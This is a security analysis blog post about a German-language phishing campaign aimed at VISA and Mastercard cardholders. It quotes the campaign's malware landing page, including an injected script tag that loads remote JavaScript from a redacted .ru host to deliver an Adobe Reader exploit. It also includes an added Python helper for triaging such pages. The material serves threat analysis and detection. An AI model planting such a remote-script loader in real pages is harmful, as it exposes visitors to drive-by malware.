Creditcard multiphishing with malware

We have started to see a new phishing method in the wild.

This is the first time we have seen a single email carrying two phishing URLs, aimed at two financial institutions: VISA and Mastercard. The email is also specifically targeted at German-speaking credit card holders, since at the time of writing it exists only in German.

The email is well crafted, although the German is not the best, and is sent as HTML (with a plain-text part as well). It purports to come from CCRD Operating Company, Inc., a legitimate company that owns the domains CreditCard.com and CreditCards.com. In reality it is sent by a bot running on an infected computer with a dynamic IP address.

The URLs and the Websites

The target URLs have a particular format: http://host1/verification/?page=mastercard_de and http://host2/verification/?page=visa_de. Both hosts accept both tags: swap mastercard_de for visa_de (or the other way round) and you are redirected to the "correct" fake website for that tag. So the operation is multiphishing on the back-end too, with one web application serving more than one website.

At the bottom of the page there are links which cannot be visited until all the information in the form has been filled in correctly.

The Mastercard fake website is built like the VISA one, another sign that we are dealing with a multiphishing operation:

The links at the bottom of the Mastercard phishing page behave the same way as on the VISA page: they keep the user from visiting those pages until all the information in the form has been entered.

The catch

Yes, there is a catch too. When the websites are not serving phishing pages, they distribute malware. If the query parameters are removed, a specially crafted page is served instead:

<body>
<div id="centro">
</div>
</body>
</html>
<script type="text/javascript" src="http://XXXXX.ru/Firewall.js"></script>
<!--ccea939cf584bc8abd8b2dd28b5b7b13-->

When opened, the page automatically loads a PDF document, which AntiVir detects as EXP/Pidief.cjd; the PDF tries to exploit bugs in the Adobe Reader installed on the computer. Avira detects the phishing websites and flags the email as spam, and Guard detects the malware dropped by the PDF.
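The two observations above (the back-end serves any brand tag, and stripping the query yields a malware landing page with an external script injected after the closing html tag) can be turned into a small triage helper. The following is an added example written for this article, not code from the original post or from Avira: it derives the sibling URLs an analyst would probe next, and scores a fetched page against the traits of the landing page shown above. The hosts, the brand tags and the XXXXX.ru script domain are taken from the article as they appear there; the scoring threshold, the benign sample page and the function names are assumptions.

```python
"""Triage helpers for the multiphishing pattern described in the article.
Added example; brand tags and the landing-page sample come from the article,
the rest (names, threshold, benign sample) are assumptions."""
import re
from urllib.parse import urlsplit, urlunsplit, parse_qs, urlencode

# Brand tags observed in the campaign (from the article).
KNOWN_TAGS = ("mastercard_de", "visa_de")

# The landing page quoted in the article, kept verbatim (XXXXX.ru is the
# article's own redaction, not a real host).
SAMPLE_MALWARE_PAGE = """<body>
<div id="centro">
</div>
</body>
</html>
<script type="text/javascript" src="http://XXXXX.ru/Firewall.js"></script>
<!--ccea939cf584bc8abd8b2dd28b5b7b13-->"""

# Constructed benign page for comparison (assumption, not from the article).
SAMPLE_BENIGN_PAGE = ('<html><body><p>Hello</p>'
                      '<script src="https://example.com/app.js"></script>'
                      '</body></html>')

EXTERNAL_SCRIPT = re.compile(r'<script[^>]+src=["\']?(https?://[^"\'\s>]+)', re.I)
HEX_COMMENT = re.compile(r'<!--\s*([0-9a-f]{32})\s*-->', re.I)


def variant_urls(url):
    """Return the URLs an analyst would probe next for a phishing URL of the
    form http://host/verification/?page=<tag>: the same host with each other
    known brand tag (the back-end serves every brand), then the URL with the
    query removed, which the article says serves the malware page."""
    parts = urlsplit(url)
    tag = parse_qs(parts.query).get("page", [None])[0]
    variants = [urlunsplit(parts._replace(query=urlencode({"page": other})))
                for other in KNOWN_TAGS if other != tag]
    variants.append(urlunsplit(parts._replace(query="")))
    return variants


def landing_page_indicators(html, threshold=3):
    """Score a page against the landing-page traits: a script placed after
    </html>, scripts loaded from an external host, an effectively empty body,
    and a bare 32-hex-character HTML comment (the marker seen in the sample).
    The threshold of 3 out of 4 traits is an assumption, not the article's."""
    lower = html.lower()
    ind = {}
    end = lower.rfind("</html>")
    ind["script_after_html_close"] = end != -1 and "<script" in lower[end:]
    ind["external_script_hosts"] = sorted(
        {urlsplit(s).hostname for s in EXTERNAL_SCRIPT.findall(html)})
    body = re.search(r"<body[^>]*>(.*?)</body>", html, re.I | re.S)
    text = re.sub(r"<[^>]+>", "", body.group(1)).strip() if body else ""
    ind["empty_body"] = body is not None and text == ""
    m = HEX_COMMENT.search(html)
    ind["hex_marker"] = m.group(1) if m else None
    ind["score"] = (int(ind["script_after_html_close"])
                    + int(bool(ind["external_script_hosts"]))
                    + int(ind["empty_body"])
                    + int(ind["hex_marker"] is not None))
    ind["suspicious"] = ind["score"] >= threshold
    return ind


if __name__ == "__main__":
    for u in variant_urls("http://host1/verification/?page=mastercard_de"):
        print("probe:", u)
    for name, page in (("sample", SAMPLE_MALWARE_PAGE), ("benign", SAMPLE_BENIGN_PAGE)):
        print(name, landing_page_indicators(page))
```

The external-host trait on its own is of course common on legitimate sites, which is why it is only one of four signals; what makes the article's page stand out is the combination of an empty body, script injected outside the document, and the opaque hash-like comment.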

Sorin Mustaca
Manager International Software Development